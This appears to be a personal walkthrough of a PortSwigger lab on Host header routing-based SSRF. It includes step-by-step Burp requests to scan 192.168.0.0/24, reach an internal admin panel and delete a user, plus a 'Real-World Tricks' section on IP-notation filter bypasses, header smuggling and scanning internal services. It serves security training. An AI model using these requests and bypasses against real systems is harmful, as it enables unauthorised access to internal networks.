[Exploit Host header–based SSRF](https://portswigger.net/web-security/host-header/exploiting/lab-host-header-routing-based-ssrf) to pivot into an **internal network** (`192.168.0.0/24`), locate the admin panel, and delete `carlos`.
1. **Confirm SSRF capability**
* `GET /` in Burp Repeater → replace `Host:` with **Burp Collaborator domain**.
* Poll Collaborator → HTTP hit confirms outbound request capability.
2. **Enumerate internal hosts**
* Send request to Burp Intruder.
* Disable **Update Host header to match target**.
* Set Host to:
```
Host: 192.168.0.§0§
```
* Payload type: Numbers `0 → 255`.
* Start attack, sort by Status → one host returns **302 → /admin**.
![[CleanShot 2025-08-12 at
[email protected]]]
3. **Access admin panel**
* In Repeater:
```
GET /admin HTTP/1.1
Host: 192.168.0.X # X = discovered octet
```
* Response shows admin UI.
4. **Craft delete request**
* Extract `csrf` token from admin HTML.
* Extract session cookie from `Set-Cookie` header.
* Build request:
```
POST /admin/delete HTTP/1.1
Host: 192.168.0.X
Cookie: session=YOUR_SESSION
Content-Type: application/x-www-form-urlencoded
csrf=CSRF_TOKEN&username=carlos
```
* Send → user deleted → lab solved.
In my case normal solution doesn't worked and I just send GET request:
![[CleanShot 2025-08-12 at
[email protected]]]
Try it on your own.
---
## Real-World Tricks
* **Speed enumeration:**
* Use `Cluster Bomb` with both internal IP ranges and common admin hostnames (`admin`, `intranet`, `backend`).
* **Bypass blocked IPs:**
* Test alternative notations:
* Decimal: `3232235521` for `192.168.0.1`
* Octal: `0300.0250.00.01`
* Mixed formats.
* **Chaining:**
* Combine with **header smuggling** (`X-Forwarded-Host`, `Forwarded`) if Host validation is patched.
* **Lateral move:**
* Once inside intranet, scan for other services (Jenkins, GitLab, Redis) via Host header fuzzing.